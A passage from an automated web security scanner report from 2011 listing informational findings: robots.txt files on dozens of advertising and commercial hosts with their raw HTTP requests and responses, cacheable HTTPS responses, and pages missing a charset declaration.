Date: Thu, 16 Jun 2011 13:09:58 GMT
Connection: close

User-agent: *
Disallow: /

21.63. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:11:49 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "37f8c1b-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=999673
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

21.64. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:08:09 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

21.65. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 17 Jun 2011 11:26:36 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 16 Jun 2011 11:26:36 GMT
Server: QS

User-agent: *
Disallow: /

21.66. http://puma.vizu.com/cdn/00/00/20/73/smart_tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/cdn/00/00/20/73/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:14 GMT
Server: PWS/1.7.2.3
X-Px: ht-d iad-agg-n12.panthercdn.com
ETag: "9c6e3-1a-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 02:05:20 GMT
Age: 308814
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

User-agent: *
Disallow: /

21.67. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 16 Jun 2011 11:28:42 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

21.68. http://rd.rlcdn.com/rd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/rd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 26
Last-Modified: Wed, 15 Jun 2011 22:47:32 GMT

User-Agent: *
Disallow: /

21.69. http://reviews.homedepot.com/1999q/202642971/reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reviews.homedepot.com
Path:	/1999q/202642971/reviews.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: reviews.homedepot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 16 Jun 2011 11:33:23 GMT
Content-Length: 191
Connection: close

Sitemap: http://reviews.homedepot.com/sitemapindex.xml.gz

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /

21.70. http://rmd.atdmt.com/tl/DEDENACCEACE/012f5850bb5d4d1c8cbf7566089f1db6/95c1b6c96f2e40f38e53ff93b84b6cd9012f5850bb5d4d1c8cbf7566089f1db6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmd.atdmt.com
Path:	/tl/DEDENACCEACE/012f5850bb5d4d1c8cbf7566089f1db6/95c1b6c96f2e40f38e53ff93b84b6cd9012f5850bb5d4d1c8cbf7566089f1db6.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rmd.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Sat, 18 Jun 2011 23:06:45 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

21.71. http://rover.ebay.com/ar/1/76417/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/ar/1/76417/4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 1272
Date: Thu, 16 Jun 2011 18:17:06 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

21.72. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 27 Mar 2011 17:03:49 GMT
ETag: "1fc812a-1b-49f79cf8fa740"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.73. http://script.footprintlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://script.footprintlive.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: script.footprintlive.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:15:53 GMT
ETag: W/"26-1249911166000"
Last-Modified: Mon, 10 Aug 2009 13:32:46 GMT
Server: Apache-Coyote/1.1
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.74. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:41 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

21.75. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: services.krxd.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:26:30 GMT
Last-Modified: Fri, 13 May 2011 20:28:30 GMT
Server: Apache
Set-Cookie: ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:46:30 GMT
Set-Cookie: AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:46:30 GMT
Vary: Accept-Encoding
X-Request-Time: D=75 t=1308223590654213
X-Served-By: logger014.krxd.net
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.76. http://soundcloud.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: soundcloud.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Sat, 15 Jan 2011 10:42:01 GMT
X-Cacheable: YES
Content-Length: 235
Date: Thu, 16 Jun 2011 19:27:38 GMT
X-Varnish: 2254820183
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS
Vary: Accept-Encoding

User-agent: *
Disallow: /imprint
Disallow: /feedbacks
Disallow: /transcodings/
Disallow: /connect/
Disallow: /messages/
Disallow: /customize/
Disallow: /*/download$
Allow: /

Sitemap: http://soundclou
...[SNIP]...

21.77. https://soundcloud.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: soundcloud.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 19:28:29 GMT
Content-Type: text/plain
Connection: close
Content-Length: 235
Last-Modified: Sat, 15 Jan 2011 10:42:00 GMT
Vary: Accept-Encoding,
Accept-Ranges: bytes

User-agent: *
Disallow: /imprint
Disallow: /feedbacks
Disallow: /transcodings/
Disallow: /connect/
Disallow: /messages/
Disallow: /customize/
Disallow: /*/download$
Allow: /

Sitemap: http://soundclou
...[SNIP]...

21.78. http://spe.atdmt.com/ds/DEDENACCEACE/Accenture_Image_FY11_Video/us_shark_flash_728x90_8k_v1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/ds/DEDENACCEACE/Accenture_Image_FY11_Video/us_shark_flash_728x90_8k_v1.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Sat, 18 Jun 2011 19:27:40 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

21.79. http://spotlight.creditcards.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spotlight.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:33 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 19:25:56 GMT
ETag: "b7aa9-17a-4903d2e989900"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

21.80. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Thu, 16 Jun 2011 11:22:46 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.81. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x708 1800
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

21.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 10 Jun 2011 18:11:42 GMT
ETag: "1b078d-1a-4a55f806dd380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Thu, 16 Jun 2011 12:04:23 GMT
Connection: close

User-agent: *
Disallow: /

21.83. http://tf.nexac.com/media/1809966/na.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/media/1809966/na.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.84. http://va.px.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:46 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

21.85. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15011168408673 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s15011168408673

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wasc.homedepot.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:39 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2d9114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www91
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.86. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:23 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.87. http://www.cnbc.com/redirect.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/redirect.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Wed, 15 Jun 2011 13:46:13 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 C aicache6
Content-Length: 121
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 13:46:13 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/sitemap_news.xml

21.88. http://www.creditcards.com/__ssard.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/__ssard.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:28 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 16:54:24 GMT
ETag: "925c7b-19b-496e8f92e9000"
Accept-Ranges: bytes
Content-Length: 411
Vary: Accept-Encoding
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /t.php
Disallow: /sb.php
Disallow: /enter/
Disallow: /oc.php
Disallow: /oc/
Disallow: /b/
Disallow: /ptrans/
Disallow: /xtrack.php
Disallow: /search.php
Disallow: /matrix/
Disa
...[SNIP]...

21.89. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.180.40
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.90. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 16 Jun 2011 10:50:22 GMT
Expires: Thu, 16 Jun 2011 10:50:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

21.91. http://www.googleadservices.com/pagead/conversion/1049525132/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1049525132/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 16 Jun 2011 11:28:52 GMT
Expires: Thu, 16 Jun 2011 11:28:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.92. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Navigation

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 26 Nov 2010 21:06:16 GMT
ETag: "1029-538-17d4e200"
Content-Type: text/plain
Expires: Thu, 16 Jun 2011 11:27:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:27:13 GMT
Content-Length: 1336
Connection: close

# robots.txt for http://www.homedepot.com/
User-agent: *
Disallow: /*SiteMapView*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=List*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=A*
Disallow: /
...[SNIP]...

21.93. http://www.ilslaunch.com/modules/node/node.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ilslaunch.com
Path:	/modules/node/node.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ilslaunch.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 20 Jan 2011 18:23:05 GMT
ETag: "278012c-636-3983b440"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Thu, 30 Jun 2011 10:51:26 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

21.94. http://www.inlandbusinesslaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inlandbusinesslaw.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 21:20:01 GMT
Content-Length: 25
Content-Type: text/plain
Last-Modified: Thu, 16 Jun 2011 17:55:55 GMT
Accept-Ranges: bytes
ETag: "908b9da34e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

User-agent: *
Disallow:

21.95. http://www.lightsquared.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lightsquared.com

Response

HTTP/1.0 200 OK
Date: Thu, 16 Jun 2011 10:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

21.96. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:31:04 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

21.97. http://www.wunderground.com/dotset.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:47 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Wed, 25 May 2011 17:04:10 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

22. Cacheable HTTPS response previous next
There are 3 instances of this issue:

https://services.wsj.com/Gryphon/jsp/retentionController.jsp
https://soundcloud.com/login
https://www.mavitunasecurity.com/support/checkupdate/

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

22.1. https://services.wsj.com/Gryphon/jsp/retentionController.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.wsj.com
Path:	/Gryphon/jsp/retentionController.jsp

Request

Response

22.2. https://soundcloud.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Request

Response

22.3. https://www.mavitunasecurity.com/support/checkupdate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mavitunasecurity.com
Path:	/support/checkupdate/

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 17 Jun 2011 10:42:37 GMT

0.0.0.0

23. HTML does not specify charset previous next
There are 52 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://480-adver-view.c3metrics.com/v.js
http://a.tribalfusion.com/p.media/a0mNJHpdZao56Zb14cbeTGJaWcJkSAMyWdJUUUn15bEtUEMqVEJ9PavIScZbJRrixPWvcWVbV2UenmtaOXayM2WYCQGFB26JFpWXpVWbb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBlsZb2kS/2020316/frame.html
http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html
http://a.tribalfusion.com/p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html
http://a.tribalfusion.com/p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html
http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow
http://ads.bridgetrack.com/track/f/
http://amch.questionmarket.com/adscgen/st.php
http://api.cnbc.com/api/movers/movers.asp
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90
http://b3.mookie1.com/2/B3DM/DLX/1@x71
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.krxd.net/kruxcontent/krux_iframe.html
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cdn5.tribalfusion.com/media/2516896//frm.html
http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm
http://ds.addthis.com/red/psi/sites/www.cnbc.com/p.json
http://fls.doubleclick.net/activityi
http://m.cnbc.com/mytest/ipecho.php
http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js
http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html
http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
http://optimized-by.rubiconproject.com/a/dk.html
http://pbid.pro-market.net/engine
http://platform.twitter.com/widgets/follow_button.html
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
https://soundcloud.com/login
http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8
http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tags.bluekai.com/site/2939
http://tf.nexac.com/media/1809966/na.html
http://uac.advertising.com/wrapper/aceUACping.htm
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.inlandbusinesslaw.com/
